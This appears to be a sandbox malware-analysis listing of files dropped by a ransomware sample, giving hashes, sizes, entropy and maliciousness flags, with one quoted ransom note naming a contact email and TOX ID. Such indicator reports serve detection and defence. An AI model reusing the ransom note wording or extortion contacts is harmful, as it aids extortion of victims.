                                SHA-512:AB636B97864D8D43BB91E1BA2992ED86E2265219C8BE957C25EF3EEEC63FB3359EC7DFAF5DCF3E8C1ACE60673F06563410D4F5DB14ABB921A0416862C6B3825C
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):44736
                                Entropy (8bit):7.995962492060327
                                Encrypted:true
                                SSDEEP:768:z/4xeuJ1ElyGDDdmDIyob8J20C5CxV6j0OS+MSo/usYx7BExAlMZpI0kMa:z/8PWlhFz0x40ZpiFEalMXI0va
                                MD5:501295E3810366FF26462A6046F06EF8
                                SHA1:558CB519E77EB8E3313ECD40364B7C42A86840E7
                                SHA-256:90C1533764AAEAA36FCBA6EF04B2F009717BC79783269D68110319F54E565A34
                                SHA-512:9C746FE99D0B0B4C85CF2B8A42BB1F642008EADB243AE438482FE7717A336E415FC9EC36F6DBD3705E892A40D01CAB8470DC2FC7EB4941B137CEB8205865369D
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):50126
                                Entropy (8bit):7.9961025303649045
                                Encrypted:true
                                SSDEEP:1536:9w7D3ctmJzLzokJoekSEJp3biUqEsRFi88gIox0t8:9w7jlXEkJoezEJp3biUpscG0t8
                                MD5:E1C4EB68729093D7F802B9C303053E7E
                                SHA1:65CA79F744FBCC518BB13E4F7F50ACCD1D36BD20
                                SHA-256:FB9C29EC4257F1E76ACE687A995F78F934BD85D0632DB173DCCBB5E0B23B7F62
                                SHA-512:89685CABC2BB2A98E46AFD84A8E5477DFB50D193714559DE7161CC89ADAF5FA07A23C73BA230697015C34F4B03165C5364DA831A9AE11BD71F0F95E2B3A987DE
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):53952
                                Entropy (8bit):7.996142365762297
                                Encrypted:true
                                SSDEEP:1536:FvNnr+NU8JrqTpmlW1zcmyPlVcwJdqEiX6eN:RkpJrqTEl2cyidaN
                                MD5:DDC1B6C8056A292120E89D7253707226
                                SHA1:D5E031FAA5E8031F3665EE2D0D674EF9A85C9E9D
                                SHA-256:4C02B1AA311CD87A5A68BF26168FDBE9BB395690FD95AB4C4AD24EEEE070776D
                                SHA-512:45C19766C51FC3D945D4761AB0FE05B3F76F348732FFB6411057DD1910FB4E0D886994CFDCF32581F534DDA1C605591C78645821B4FD530106A1370960F7BEA8
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):727248
                                Entropy (8bit):7.54530492891434
                                Encrypted:false
                                SSDEEP:12288:NAv2/xE/TfXA0F1ll7I4zXXRpR4uBkrdyWbh1v/Q2G9d4lOiezp4xFuM2IL:NmWxyTfXAGRCrsE1XpY4qzubVL
                                MD5:D9ACF169A824F28B1C9D68CED0D4A8D5
                                SHA1:7F46DC43EE7099AAB844BECF0BCBCD9047DF7D95
                                SHA-256:37027F25E22A5982C1E51760D550A536C7C069EE9EC7A2C24B301BAD18BE0D59
                                SHA-512:DCABA78B8E3D40B4A55FFE4008BD08029EC5E9EF1421083BEE233BA18F76BAC9DA7AD16F80DAEBC06034046374ED078B4B5FA7258A5C45E292CF69EF2643A0B8
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13601
                                Entropy (8bit):7.983221224499428
                                Encrypted:false
                                SSDEEP:192:tYyE5lk52JOO25uOA0MwO1d6hUfDIzXwCTbz0Fj07S8Oyb1yo3/ube9B6fx+VOy:Czm2J6u/d62D4XFej0+yhtGbe92+VOy
                                MD5:228C32A343F3D291286FAC3475B996A5
                                SHA1:F27B617C47397BC4330416A1EE927EB212ED094B
                                SHA-256:5471EF50559AA7365A633D502EEBC078D0C437B00DCE68E11E5DA059B01F8B22
                                SHA-512:178A9DE7F07B8E63892DBF4F2FF083346CC57320B1F2D1EDC65378CD45AB570E16EA199FBFBA84A1C01CD855E278A1F73D09626302183286283DA94C650A6848
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29584
                                Entropy (8bit):7.994526651388148
                                Encrypted:true
                                SSDEEP:768:+yK1t1xk6Q1cDmMt/P0MJ77mO98fl0y4tLu4LY:81q6KcD1/P0ii8by4dc
                                MD5:35E4607D6D1847E241ABB915EA0AFE85
                                SHA1:6EBF1377931629FA09E054C7224DDB7D5B9C6031
                                SHA-256:5BD93254C5164C607BDD196E17A6B723D12049A623D1666CDE9C793992667F2F
                                SHA-512:1B7B83665BFC273727BE351D43889AC1651D205A3AD2B52A639FB2D1C7D50C086409B93B4586EAD9FB51CFCDF3925F530A5B544A6535BF2B45BFAC9A8C9CCFF9
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):921296
                                Entropy (8bit):7.15979202597751
                                Encrypted:false
                                SSDEEP:24576:2t0yRV0GZzcgyxUbCPnImH52jW5dG+Fabp:2S+V0GuHMjW5aN
                                MD5:BB5CA076A2C8CCA0930F5A6263626A43
                                SHA1:25FC19EEA2DCFC14CBC7CE86C284D16DC21FDE1F
                                SHA-256:BBED363836AE4C1F64C78443C44F699C103F6F22CE522883CCD3FA1F046CD050
                                SHA-512:3F2E88551F326EB443681C64B753F29909FA41A5448DAA98CA0EC3899C6C846C4C555481EFD4519021CA9B3CFCECDEA2DF36F89AABA053F9D67BD6068AD47D17
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):28154
                                Entropy (8bit):7.993722721890511
                                Encrypted:true
                                SSDEEP:768:PABJTEFKs4FOV6pUbr/t+spf/KSxP9M5MeKvnj1IVPeR0H:0hEd4Fwh+G/KSxO5pKvnj6PeRO
                                MD5:EA0DA680B9484333A3BD95DF422FAD04
                                SHA1:D154E948152899B8E4842BEC241241E62695146C
                                SHA-256:B27AB290002DA1C76024494BD44D722AD3214D40B743CA5542B3DE9EE87562FF
                                SHA-512:683960C31E1D60ECD1CE5DD726052E56F152CD407BA3EC3BACAB1C129793C4AC3524F74B65A77524DC65763C034B4B4DE265E7D4FBE65E30D8794045DA61B21B
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3462
                                Entropy (8bit):7.940917216573625
                                Encrypted:false
                                SSDEEP:96:vzykSMVNYouBXofDeVhm7GSKlpycLPqMevuAVOfh:rykdV6BYfDWhmCTyczqM+VOp
                                MD5:EC862B4F15B1E1B093AF21D3D30B5D54
                                SHA1:FC87989D1E58611418CAC99751C5A8F1315ED0E0
                                SHA-256:C6A55D67958D9BA421D8468B620C885AA43CCBE89F7513EBDCC96675F682622C
                                SHA-512:6BA46FEDD864068956F576BCC5359F725CB4E6A5149987015BEEB8E0D50588F14B1505DEDAFE00873315917AB2D725214664CCAC505018DCD821E97EF1EBA470
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64878
                                Entropy (8bit):7.997374523369192
                                Encrypted:true
                                SSDEEP:1536:mGzMDm97mWHuma/m8ogMsczPjsQ/AZJz/+jyv0U7E3kYd:mGIDm97mXma+MNCAGCV/+RR3L
                                MD5:AF6BCD827E25579D2E48FDE08714F93B
                                SHA1:46CCA749B27C16402BB064E1C07D4AE480A16EE1
                                SHA-256:0E8FF2CE34CF7F87578C0659A234B52D53C468D0F77C25EB7896B204A9125D5E
                                SHA-512:01FC0232435F459D849F1881A01B067E6475505CE18B7B1F0A474C73C6A40DD4F65F9BCA0D913DDBE498CEB00D7345C41CF1CE9BB5D1985716D760E682B6305D
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6801
                                Entropy (8bit):7.972191929260046
                                Encrypted:false
                                SSDEEP:192:6fhPWgVkJwaFjVonsPAek/S68nTTd4wnZdKJyVrkJMkIh0+VOV:6fEgVIj+nsnk/SNnPrZdGErbkIh0+VOV
                                MD5:78A4C61DB2327F3F1E8AB2D36F80E681
                                SHA1:7A6D361C8CC0E8BE8CA52DAD4F3E150194BD60D6
                                SHA-256:9A10B1CBBAFF564343DC534D9EEEAC31E2AFF37A4F1EC800FF6BB6CB40453C49
                                SHA-512:56DD2C11F44E17E6884431B125105792412604104F4FEBF77D9C305B9FB3744E69470DDC8C0E8ACB43DCF8A407A33A444D964AC6416FE7C68DC1DAEE54A011B1
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12443
                                Entropy (8bit):7.985215528092471
                                Encrypted:false
                                SSDEEP:384:Y5+dQGeZXLFStcMW47H+tkWtMFNYt5QaGCQL8lo618ZR4+VOd:5dQGCGcur+tkNYQabY8ld/Z
                                MD5:C796F4D03DFB0EF210F32E727BAD98FA
                                SHA1:AE263A8FFC9EDA3FD853471768AD3D8264C92F56
                                SHA-256:6CA4D4DA485DF413F3FEA6CD2A22798D998FF9D936044722B17B5F13EA84A3B9
                                SHA-512:5612B4CF503828AE16D3ECD1BBF2F774D99BE6ED0CCED135584D0186A4BAF51A0EB076F484AA6869739B2D180F52F35E6E49C6925C2D3F5F7406A013B1FCFC13
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6134
                                Entropy (8bit):7.969404432664336
                                Encrypted:false
                                SSDEEP:96:AMD5w5uhX3YEqVaHKDXD35Ia2p4+IPDLs6LXetUmd+7mb1RsUD8mHPuspSvV0GgE:hVwE3Y7fz3H6/wU6LXet/vRzvPuSSaGx
                                MD5:7B44CCB97188BF079BB944B1BB631DFE
                                SHA1:872B85954E6362B139A7DF6DDBB6AEF75A2B13BF
                                SHA-256:9D6D33EBC9BF67174530B7516AFB035FA7070557DE1ADCA238A3887318E9BC66
                                SHA-512:EB3AB577DC02FBA9C89C3987EE37657B831E448F51D9E544E4B4973896DE626049E5FB05E0D577B51B0A2D4A52406859E594D47727F5E403391B8D5BB4DF926C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):14341
                                Entropy (8bit):7.987830222270157
                                Encrypted:false
                                SSDEEP:384:xkauvt1+daIWOPrEiDtSNryP2BvKmC17gYwn+VOq:xkauvtwdQO4eSNryO8f7xq+
                                MD5:067F1517FD4BDFB132D8357C76907A22
                                SHA1:5D76C35435FA39632757800F4DEDC293D2F30F99
                                SHA-256:4DD510C1088B44DC099292A4C202DD4AC6277BABAABEEF153BE9030808D8E80B
                                SHA-512:FBBE0A2C846BF624814E17ACDD0D5D17683B34C5A7241D6AE2F1106B2DABCDE8BDF9A56F1C15323ECBE4FE68F821CB5BEC9CEAD0192A096404524392711B207E
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3273
                                Entropy (8bit):7.938864640053381
                                Encrypted:false
                                SSDEEP:96:WhYNSWoCkVxnn72cRtBDYKlOuvrYHevuAVOe:Whe/oCkznnycRtBDYK1ru+VOe
                                MD5:40FEE7ED1E55A9D50C78235CFD7A64BA
                                SHA1:C85876704CF0017949E9D5E8636CA8C2F2C47BE9
                                SHA-256:B5D56330E8F19FE93DD2342CE6E7A31CCB8511EEB52B7764D50F12E2F130C698
                                SHA-512:22AAF118BC3D76EFC5995C24228CC633B281ECC0EDD9D8D42A1E58BE742B64C26D882AC85624704226D71400628A396375980A1A6B7C0B0417BED2D5B9C3DFBE
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10009
                                Entropy (8bit):7.982759594693455
                                Encrypted:false
                                SSDEEP:192:6lTT74659Fb/M6Du5WwxoquGq5LE3ryMhR2CGsl2d+VOF:yDpb/MBP+qTpdhR2Cf2d+VOF
                                MD5:09894C57565368FD054FFE7D6DA7DD63
                                SHA1:EC8ED863644CCBCC63FAA0EEBEF9605EBDEA7DAA
                                SHA-256:8DB5FDDC74AE0C456D8F0F1DCFB380F5B3D3E8E0D14343EA85C2A18855DFC171
                                SHA-512:0EF28457976A8E6A64573C7C2B847158BD7E85ECD3058D29CEE1DCFFDD0BFE289AB6FF84EBD14B8B39CCB8EE3E548B9B58B3F90A3D2FD04DB56A7D8879B4BFCB
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7297
                                Entropy (8bit):7.975410771018185
                                Encrypted:false
                                SSDEEP:192:n86N8K7e//WyGCRx0kx+DP4QpkCpHqAaXerbe7E1S8W+VOv:/z7UOY0HkwHKerbe7yS8W+VOv
                                MD5:F5FE8E66FF5745735032F6C4C75CF857
                                SHA1:462E7DAF0FD229CE183ED705B92C2013B185BE0D
                                SHA-256:E7BC6D464EA6E77C5A892A49E9A708D10096D560F8110781537C64A291DF57AB
                                SHA-512:1FB2A3365A3D6CEA00524CD4B185F814CE7653239A05EB9ADC72B95AFE463EDBED5250D0F169617BB2BE5F92A28E563339C20FD3D9A39784F9FE2A412A2D5A13
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):110649
                                Entropy (8bit):7.998577390807684
                                Encrypted:true
                                SSDEEP:1536:b+zJ499sDgfP9aYIDzb0RG6ve8dFdVjzNRC5My7CrFUX9wBqjoZfbTZNplHMrDcx:biJ499sDg8YuAveIVjDqHGRbzT3s8x
                                MD5:8524DE3FCD7AE23F7D7A9CEEFADA7CF4
                                SHA1:A34EA92656E68D9F408C7362D40ACBD805522986
                                SHA-256:C4FA6FB9E8614F7D572FF693ED8A41CDFED4D094D947CF22380D2889DCA70698
                                SHA-512:C99811C3BD781128FC679B40F88E1F4A204717007161E390881712575D95F763D5D28301F5EE70097EB0C217687458AE0609DA17748ED89578F3E543BDA13F40
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1759
                                Entropy (8bit):7.867088924016625
                                Encrypted:false
                                SSDEEP:48:7Sjc0wCFkZlwMf7IfeZ/WyYu+MAVMJg6T1j:7SrwYkZl5f7xevuAVOZ
                                MD5:89C66F176FD881CC66FE355194FC62F4
                                SHA1:776A2298CD9B2D1A31F44530CA55D2C34ABB3290
                                SHA-256:70F5C7709A1885CAF92AA16E34424A27338FCA2239C66ABFFA4A4AF5AFBFDE1F
                                SHA-512:46498D02B2D98DADCFD88C1E094474B9951534AD6C00E11AC476A9D654BC93F8EB5BB3105EDDCB8F12F96DE831B6695D57C07D118330A691102DB7524CC6B03B
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):40581
                                Entropy (8bit):7.9951768017936375
                                Encrypted:true
                                SSDEEP:768:jvs/ZJkMnuTVLnDZY6xH1J5xfcyDhrM4jgMayXpApR2MXShT0LSoPlmSxRVS0i:sZSMniDS+Vvxf1NIzM7ERGhT0LSoPlFk
                                MD5:64B7397C9B6F61D857A2D0B9F426C05B
                                SHA1:FEA3235CB5AB6757ABC09FFF6B1DF6476F2A8FF4
                                SHA-256:1D99FE25D330E8C7782A8455F191FA388430DB7916FD96395E6D534138137B86
                                SHA-512:0F49762524B68536A71E89A7FCAA1AEE5A8C308144A7328E45356F4D65627C81592E1DF2254750B30669BFACA51605A0563F9212253609576CF0CC5DA737AD08
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2128
                                Entropy (8bit):7.902718904780669
                                Encrypted:false
                                SSDEEP:48:Kf/L5JPVZ3ZAmu60vzb4+6agFfCo8tRN/WyYu+MAVMJg6T5w:EL5Z3ZAm4GagWNevuAVOi
                                MD5:39409E191C1069EB52B277F43BFD5576
                                SHA1:A33B93FEDA63A97277AD08A50C8EEFEAA4377420
                                SHA-256:23FC7C293A383FCA53476195FFD4986F42097A0A154596F4B42A96BE9A6E4F89
                                SHA-512:FB79DDCA32BC73DFE7FEB2C5A4E75354CE2B1D84F6EB9E2F1BBFBC6C90C80C69A0C12C29B7A38C4D0FD713CD171AA0C0CFE1D7D0A057C0E166FDE9519D4BDA85
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10082
                                Entropy (8bit):7.981733784576309
                                Encrypted:false
                                SSDEEP:192:Svq8vhPXwMxpfkO1ASsvPHE3Uci3v8QUjcGAyi+99+VOA:SvZPgMxpxsvc3Bi3v8Hjcqv+VOA
                                MD5:BE4D5BEF4B7E200A8F58F52C29EBF202
                                SHA1:EE381169A0D617C7BB7A9D8B79D0F928F5DF9B00
                                SHA-256:1CF9C28DCB5C388FB4AD385674731643B4C30C4E8D017F1F26F245BF4733E11D
                                SHA-512:8613EB1FECC7DD6F5434CEF2769F634AA4DC72CBBCBD0346218CA468AF2ACACD26C8E9FA14876BE93F0CC1AAB5249EBE26883F85A9CE010E10156D5C9B7E330F
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6066
                                Entropy (8bit):7.972090817515263
                                Encrypted:false
                                SSDEEP:96:DBDHvWtj5yyukkKAuI0VtCqCKr1+SkstB6/+gcsxBmqS+X3HgevuAVOuC:FDHONzBAuI0rFCKZ7P6Ggvf6aXg+VOh
                                MD5:449FF52EFC7F09FDD5922019ACD03292
                                SHA1:87240B46CB67A486380D14471ADC0B410AB1B3AA
                                SHA-256:684857B10C84FCE80E94BA379C6EAC8F506ADB8DC997FEE67A2303C34E8ECDFB
                                SHA-512:31C7CA95FBD416B12330E4E4B6D1FF11639127D2471D20CCB83465FCCB438D32CADDD44991A8B538E19FEFF45A818CFD462A1472A16803F952AFC37D27D3BCF4
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):30168
                                Entropy (8bit):7.994481161928793
                                Encrypted:true
                                SSDEEP:768:YNU7Tg00l1SPbp6HgFvIJrAG/P0Yuu7WNYFdf:Fng0c0UgdIRHUY9I85
                                MD5:74020D873E06EECCAFE0D4CE11146CFC
                                SHA1:70C2D7CB0898F567772D6C34B5BC813335C7F116
                                SHA-256:EAE73B968C0CD53327458886310F82B9C83066E17F360886179B6407352CD18D
                                SHA-512:6ABA26998DF21A8F49B6F30A032D534F7AC4220ABCEEBEB4BCC5AA558B200A49ACAF0185C7C0F26773AFA1E176E97B1AFDD67A24A1E957E54D2D20EEE42890D1
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33490
                                Entropy (8bit):7.9948156280750355
                                Encrypted:true
                                SSDEEP:768:ligBB+TXUL1Z3KfD3M1QK/2mx0L3KPU+zh8ePIXPfF5NqmqY:ligBB+TXUJZ3QD8r2mx0L+NFJw15Nq+
                                MD5:90D91CAD42D4582941239C027FA6E5CF
                                SHA1:450207A06D3F90BA710AC58E4DF1FA0FEDD6FBD9
                                SHA-256:A797AFD81ED1E0442E3011C2E007BC44F2AF799516CA25EF46886320C86FEC57
                                SHA-512:8C97E2A2975F5E5D4E2C87D16BFC1037B0F9DF70F7E51E5C3DFB60DCC7F2CA421DC5AD17AC914CD3C205EAC05AAC5E3882385F161D12AA86E71CBD65DC95F35B
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):39594
                                Entropy (8bit):7.994625408041425
                                Encrypted:true
                                SSDEEP:768:3WZXM1+ZRpeKcLtQKJDFbxfvlZC4D6QhlemYoFxSIEmOAcRp7TZfFM/RL:IRpeKatHBxXSc1hle2WPAcRp5ts
                                MD5:F114C3EC82259355422D39744E3DBC59
                                SHA1:9E814BC8EDE2AEAE39CC069D96FD49319C8CDB85
                                SHA-256:BFFC2973CB5B92AFA61A27B557C5089BD2555648FF7E2140088A360901118A04
                                SHA-512:18D43FC74EF7E602A7644D642F8054E70604A35133360E296E56A6AB131FB23291F0F277EC8505BD074907762FB31E26F687E510E86920464C2471BC232E0D17
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:PGP Secret Sub-key -
                                Category:dropped
                                Size (bytes):12615
                                Entropy (8bit):7.98572150547311
                                Encrypted:false
                                SSDEEP:384:Uux+VS3JVTjm4Dzt+qp+l8jXGY1JDUGpv+VOX1:nxg6K4DpmjADbL1
                                MD5:33797C6A0930B40CB083058C0657921B
                                SHA1:EE461057C59EDBE3A6A667CD124519D2C8DDFCA3
                                SHA-256:04F822E42C0875ECBF5123795070B47791909FDDBC7ADA4942B178DD928F90FE
                                SHA-512:7EE7BC3F4BF66AEEC2A1AD025CBBC77A23B82C88D99CF946617C47A5F717236814B703B0756F820D8F460EC73B2CFDEE09327730A3E62156ADD8FDB87A74CC2F
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2215
                                Entropy (8bit):7.914268010192206
                                Encrypted:false
                                SSDEEP:48:XV9wGQY+QujhGMqariuLn15sYsaWi+z8Amf/WyYu+MAVMJg6T8jk:3QfZqyL15sdzSfevuAVO8jk
                                MD5:5CDAF28294CD49C96460F383DAAFA323
                                SHA1:DBC6B8E385DB7F3CB633A772B009B778F5DB55C2
                                SHA-256:6C28F6D6900D1AC9E377DBB390925F720D43CBEB2347FFFABB881047107460CF
                                SHA-512:E5FCBBD0578BA4A81765DECBFB7C3A1224F510BB4AC2C600933240DEEF8DF4F3E6FEEE05753A7DC5B725D34652A382B71765394D5C4E5A630C647340F28D1866
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):96134
                                Entropy (8bit):7.997944598452704
                                Encrypted:true
                                SSDEEP:1536:YVTouI2r7FTe5YGFSxuoj95BLWFHd2DR+XW56Ic6er55OrYRWGuVFjQd+V:eTgKFTe5jIsoj95BLWFHd2DCW56Zr5kB
                                MD5:35E96EE34AC94F3FA9A560D086FC1E14
                                SHA1:41BF2E228A0C0D5FDE7CEE4683312E8807C283E3
                                SHA-256:2C31F2FE56E276E3A45BCCE794CB6BDF901B95CDFD5502A4D6A3CC0BC6310BE0
                                SHA-512:383289B7156D24CF52D8A231A599C373AF0055591CDE17CA7582DDFA9F2E8D3E103EBFE0A6FB70C44BC80E22FFF9BAEB46A5071C8AAE1148C4DC27826935F1F7
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):204689
                                Entropy (8bit):7.998953386038572
                                Encrypted:true
                                SSDEEP:6144:L7m5HDV3QHORlZY92Wn3zIb88zK5Tod+A:L7m5hO0ZY0Wn3zkR6ah
                                MD5:156B24A8C90C95A8C8245156958D6F42
                                SHA1:898263276E98D291A3728402DEF8290E1E104D8C
                                SHA-256:A3A5A2704F3F73ED234D4E51C92C5C93FE6464B253DF7805F02FDF98BC942C83
                                SHA-512:97082E9B1FEEACE6672154BA6FD40986033B891F764D4C49FC971C46D62F014C8943F468B409D3AEAB9BCA57112AF5974B35964F7958714081966251A6D8DABD
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):20569
                                Entropy (8bit):7.990741444866277
                                Encrypted:true
                                SSDEEP:384:5irAwJ+H64sfscmTYYEMILyadMuwp1ygVRMTINOar/AW/dEdZXmWbTStUU4nm4W7:srFi6RfHmTfEMI15wXygHmM/dEdZxTSv
                                MD5:037D346EF8654808A016C1D362C7EC50
                                SHA1:EE25CA72B04D2B9D31B5C661529E23F93490CF95
                                SHA-256:EEBE2BC788F6BD503F6286B5F0522466D00C09A8F5E7CB45A826B31CBC0E1CDC
                                SHA-512:759BF0D8DF0BF514C89B77095569F1AAF8C059B1D9AF126B23A33E39BA91E36141419839C1A8E81564FA5584B7F60618111B444B37E783C0F0ADE53B2A9126F4
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):30134
                                Entropy (8bit):7.993583297375008
                                Encrypted:true
                                SSDEEP:768:dkuqDArppbKd9O+LZztnF9cIy4Lckx/2Iewn882ryUC7WMac:HUAryvOEvcl4LivM882srj
                                MD5:4CDA38949198BAE427B720A3899850A6
                                SHA1:DAA6530A920CD68683C01414E5AA48384139A68E
                                SHA-256:1A02D43714B8890FE8323F2B071EFB3125C276438ED84E9B9602D51DA6265119
                                SHA-512:954C530A79FB09FEC1DE5A2CD436E2AE87BF45FCAC7240E99C82F0B99509D4EF53FFE5ED856733A600C0707368B4F6135CEDC8F1F9F5314053D89056EFFDE202
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13689
                                Entropy (8bit):7.985370118783377
                                Encrypted:false
                                SSDEEP:384:J+zEWzJgt9Zv+NCIeuGZWkoWn5dcrwWMyNwr+VOe:aHgt9Zuv3Vk3n1y4K
                                MD5:6702A4DEA1D88FAACE2FB7E7A7F399BD
                                SHA1:AEEC92DEB58C6B6FB5C6524949814C85780D387E
                                SHA-256:0FA92F9F0FE495D3F92A8956447DE2C06571AD77D4830D94AF548481F3FC85A0
                                SHA-512:51773BF2D327B9827C5386A03FB6C37BBEC289834ACEA17CD3C36111922ED61F2CB795D87BA6FFC25DE30239DE44B78DCE1A1FFAB1632855A0CCDCE156358FAB
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):26096
                                Entropy (8bit):7.992708898630628
                                Encrypted:true
                                SSDEEP:768:tUKdDAbw1tAZMfJxkAhb4hNiRNOB4J4EF1O:RKZKCiRNB4u0
                                MD5:E2711AF78977AE8B8D1273A354AD190C
                                SHA1:54849E75FA095A1F1A304B911EC5CE39E2ED81D3
                                SHA-256:DFFEDD1F52DF1D3049221E63407C1703E05D95152688212065F9D808B89B72A8
                                SHA-512:6B7DC28CAADF0295DE7178D0A32BED2BBDBBE5D28FE176D4AF31EF378CAC17A22681BAFA0512CC23AF601D2FD4FF7B3491255C2B10417A2C3FD11E8CE0A469A9
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):18613
                                Entropy (8bit):7.99099778930684
                                Encrypted:true
                                SSDEEP:384:ZD5w+V2HJMhEJYcFLoVBF480N5f/3DWddYhlAsbUY3Gqn+VOd:ZD5xKJMhEJYcF+FofPDWohlAsbj2qnp
                                MD5:FCE0FB8FBAFC127C8960D7EE922B238A
                                SHA1:D20FA5772C47FA227F32A6A1E1A9B9AA894E6214
                                SHA-256:A01617ABDBC74E0634AC99772FE017329C3AF5E2236B536D101FBA928D211CA1
                                SHA-512:98C43DB8018628233B6BE057EA9EE37C26A077E53187F28486F75ACF2BE8F7B30604B29492196386462AFBC9C83F50B3F0DCD97C32ADA2F480074374305F616A
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):21307
                                Entropy (8bit):7.990746048928715
                                Encrypted:true
                                SSDEEP:384:fo1Mng0tI4HnpW58VH2q75U0YlDe6Ba1ub1LSyH8rdf2W0jnOBb5FSDdxLpGn+VD:foP6jHnpesv14DY1U1LSok2WpBbHSDdV
                                MD5:1F60FB3D3679410747377F1FBB08A5F5
                                SHA1:84EED593DADFB4D0704F0DF436CD46CD3DA1471F
                                SHA-256:CB064730E6D2D3B36120C8E679FE7F31EF5390CD887BCC571A3B6333ACB42AF8
